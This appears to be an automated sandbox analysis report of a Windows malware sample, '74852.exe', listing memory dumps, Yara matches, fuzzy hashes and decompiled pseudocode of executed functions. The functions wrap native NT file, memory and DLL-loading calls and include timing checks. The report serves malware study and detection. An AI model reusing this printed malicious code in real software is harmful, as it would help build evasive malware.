Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$puts$ConsoleCursorHandlePositionstrlen
String ID: %d.
API String ID: 1151322801-478215797
Opcode ID: 105375e62632a9ebfc357a76d027eacc10111541c1c9137cd87dac3c34107abc
Instruction ID: 12fe6655390d73de0688a36e6c15c166e2760ba79c6df8946f37a36045adbb72
Opcode Fuzzy Hash: 105375e62632a9ebfc357a76d027eacc10111541c1c9137cd87dac3c34107abc
Instruction Fuzzy Hash: E71179F091410ADFCF18DB84CA95ABEBBB5FF50308F240069D406BA242D231AE65CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 74852.exe PID: 5884 Parent PID: 4604 74852.exeCOMMON

Executed Functions

Function 00419FDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00419FDA(void* __eax, void* __ebx, void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v1;
				void* _t24;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;

				asm("sbb [ebp-0x75], dl");
				_t19 = _a4;
				_t39 = _a4 + 0xc48;
				E0041AB30(_t37, _a4, _t39,  *((intOrPtr*)(_t19 + 0x10)), 0, 0x2a);
				_t10 =  &_a32; // 0x414d42
				_t16 =  &_a8; // 0x414d42
				_t24 =  *((intOrPtr*)( *_t39))( *_t16, _a12, _a16, _a20, _a24, _a28,  *_t10, _a36, _a40, _t38,  &_v1); // executed
				return _t24;
			}

0x00419fdf
0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A01D, 0041A024
BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 6750f98a5c4218ed09f97764d844bdfae15c58f4d10cc16786b239be156d04fc
Instruction ID: af1acd2f518415cf7b4ff21e3a8f7ed2c2a14a100857daf8564504d2bc3e9083
Opcode Fuzzy Hash: 6750f98a5c4218ed09f97764d844bdfae15c58f4d10cc16786b239be156d04fc
Instruction Fuzzy Hash: 40F0F4B6200108AFCB14CF99DC84EEB7BA9EF8C354F15824DFA0DA7241D630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A01D, 0041A024
BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f3f
0x00419f47
0x00419f7d
0x00419f81

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10B, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A10B(void* __edx, intOrPtr _a1, void* _a5, PVOID* _a9, long _a13, long* _a17, long _a21, long _a25) {
				long _t16;
				void* _t24;

				asm("in al, dx");
				_push(ds);
				 *(__edx - 0x741374ab) =  *(__edx - 0x741374ab) << 1;
				_t12 = _a1;
				_t5 = _t12 + 0xc60; // 0xca0
				E0041AB30(_t24, _a1, _t5,  *((intOrPtr*)(_a1 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a5, _a9, _a13, _a17, _a21, _a25); // executed
				return _t16;
			}

0x0041a10b
0x0041a10c
0x0041a10e
0x0041a113
0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: cdd79bfe79f26b2cfb5d3f4775eeac692751d4814dbe7f09952881a62249e6b1
Instruction ID: fa34b5aa396031b1daf79743e54a4802fafb321b37694accd521ddaf8ea1fa55
Opcode Fuzzy Hash: cdd79bfe79f26b2cfb5d3f4775eeac692751d4814dbe7f09952881a62249e6b1
Instruction Fuzzy Hash: CBF0A0B1100149AFCB04DF58DC84CE7BBA8FF88220B05875DFD5997202C631E861CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A05A, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A05A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t16;

				asm("fistp word [ebx-0x741374ab]");
				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a923
				E0041AB30(_t16, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x0041a05e
0x0041a063
0x0041a066
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 41a9d34042db9e70e9fe3f4618449dffc54d3f582ba082a64f2039f9249d4e1a
Instruction ID: 97104060a90ce3c5037c1dc06c7b5ddbc7f68a08e84b3474b3013fae7ebf2668
Opcode Fuzzy Hash: 41a9d34042db9e70e9fe3f4618449dffc54d3f582ba082a64f2039f9249d4e1a
Instruction Fuzzy Hash: B0D02BA980E2C04BCB11FF78A4C00C67F40EE412283249ADED4E50B547D125A617AB92

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a063
0x0041a066
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01459540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145954A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
Instruction ID: b7e012df7334e707b9f99e4aa8eaf45e74de95ba84de21aa1b2f5a42d17ce743
Opcode Fuzzy Hash: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
Instruction Fuzzy Hash: 0E900265711004030105A59A0704507004AA7D5395351C022F1405551CDB7188616162

Uniqueness

Uniqueness Score: -1.00%

Function 01459910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145991A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
Instruction ID: bc6151cd61c5060c008c967ca83ef6052e272a11ccf98d00745dfc333503cd5a
Opcode Fuzzy Hash: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
Instruction Fuzzy Hash: 279002B170100802D140719A44047460009A7D0345F51C012A5454555ECBA98DD576A6

Uniqueness

Uniqueness Score: -1.00%

Function 014595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014595DA

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
Instruction ID: 35f484ba2a69007cf2119bf5de76d9d72af46e27584b94fa702d725471f5c0e2
Opcode Fuzzy Hash: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
Instruction Fuzzy Hash: 349002A1702004034105719A4414616400EA7E0245B51C022E1404591DCA7588917166

Uniqueness

Uniqueness Score: -1.00%

Function 014599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014599AA

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
Instruction ID: b200047fc456d65fea7faa11cf6cb6e753ada24f2fe4dbf64d9509a81f7f1a52
Opcode Fuzzy Hash: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
Instruction Fuzzy Hash: 849002A174100842D100619A4414B060009E7E1345F51C016E1454555DCB69CC527167

Uniqueness

Uniqueness Score: -1.00%

Function 01459840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145984A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
Instruction ID: f37ce085e701edd0894eee248fa200d4fe9e246822e07db3aeafd287eb9ce3a0
Opcode Fuzzy Hash: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
Instruction Fuzzy Hash: 1C900261742045525545B19A4404507400AB7E0285791C013A1804951CCA769856E662

Uniqueness

Uniqueness Score: -1.00%

Function 01459860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145986A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
Instruction ID: 85974c54c8aa7302d6a063efdad1b2fd99d82516394c27686197ac2388a93f6d
Opcode Fuzzy Hash: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
Instruction Fuzzy Hash: ED90027170100813D111619A4504707000DA7D0285F91C413A0814559DDBA68952B162

Uniqueness

Uniqueness Score: -1.00%

Function 014598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014598FA

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
Instruction ID: dfb4790e3dfcfdaadeb06b177b591cf420df29fe47d9223d9c2bce0950b356da
Opcode Fuzzy Hash: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
Instruction Fuzzy Hash: 4D900261B0100902D101719A4404616000EA7D0285F91C023A1414556ECF758992B172

Uniqueness

Uniqueness Score: -1.00%

Function 01459710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145971A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
Instruction ID: 3c21b096298113da3f600ce5f7832d727655afc20ff37c42dfe06327caa5fd3f
Opcode Fuzzy Hash: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
Instruction Fuzzy Hash: 7D90027170100802D10065DA54086460009A7E0345F51D012A5414556ECBB588917172

Uniqueness

Uniqueness Score: -1.00%

Function 01459780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145978A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
Instruction ID: cb04141586c5be046972351287e07a57a181b9b31302d282b389e0f282358e8d
Opcode Fuzzy Hash: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
Instruction Fuzzy Hash: DC90026971300402D180719A540860A0009A7D1246F91D416A0405559CCE6588696362

Uniqueness

Uniqueness Score: -1.00%

Function 014597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014597AA

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
Instruction ID: f85a82e543c53f19c64fb3e0f46d79c1c991ebc8e62b050bebfc9fcc98f6aa91
Opcode Fuzzy Hash: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
Instruction Fuzzy Hash: F090026170100403D140719A54186064009F7E1345F51D012E0804555CDE6588566263

Uniqueness

Uniqueness Score: -1.00%

Function 01459A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01459A5A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
Instruction ID: 4afbf3bf635daec4128fd2034003d8557e9f1f95bb4308fb5e9cdec574f333f9
Opcode Fuzzy Hash: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
Instruction Fuzzy Hash: A890026171180442D20065AA4C14B070009A7D0347F51C116A0544555CCE6588616562

Uniqueness

Uniqueness Score: -1.00%

Function 01459660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145966A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
Instruction ID: ecff8c33947a2154d74f557b333e1a0029af85e7139962d4d3318d1a4e41b29f
Opcode Fuzzy Hash: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
Instruction Fuzzy Hash: 3B90027170100C02D180719A440464A0009A7D1345F91C016A0415655DCF658A5977E2

Uniqueness

Uniqueness Score: -1.00%

Function 01459A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01459A0A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
Instruction ID: 875e50270aabe396b8343472b5b90508b3ff5f0f6d4d8038d12458e0898d4a99
Opcode Fuzzy Hash: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
Instruction Fuzzy Hash: C490027170140802D100619A481470B0009A7D0346F51C012A1554556DCB75885175B2

Uniqueness

Uniqueness Score: -1.00%

Function 01459A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01459A2A

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
Instruction ID: 8c43a569e6f2d803d4ca1888220c024f6b9fc80eebfe25833461b35df03d72a2
Opcode Fuzzy Hash: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
Instruction Fuzzy Hash: 97900261B0100442414071AA88449064009BBE1255751C122A0D88551DCAA9886566A6

Uniqueness

Uniqueness Score: -1.00%

Function 014596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014596EA

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
Instruction ID: 5fecb1f53396ab3e2f13e96cc8244ec103583e1e0287140babae375673ce8b88
Opcode Fuzzy Hash: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
Instruction Fuzzy Hash: BD90027170108C02D110619A840474A0009A7D0345F55C412A4814659DCBE588917162

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00409A90(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t40;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;

				_t52 = _a4;
				_t40 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					_push(_t50);
					do {
						E0041B9E0( &_v284, 0x104);
						E0041C050( &_v284,  &_v804);
						asm("adc [edi+0x4f], bh");
						while(1) {
							_t32 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t55 = _t55 + 0x10;
							if(_t32 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t40 = 1;
						L9:
						_t34 = E004080C0( &_v24,  &_v840);
						_t55 = _t55 + 8;
					} while (_t34 != 0 && _t40 == 0);
					_t35 = E00408140(_t52,  &_v24); // executed
					if(_t40 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t35 - 0 + _t35;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t40;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ac2
0x00409ac7
0x00409aca
0x00409ad0
0x00409adc
0x00409aef
0x00409af6
0x00409b00
0x00409b12
0x00409b17
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00000000
0x00409b22
0x00409b26
0x00409b29
0x00409b2f
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b51
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
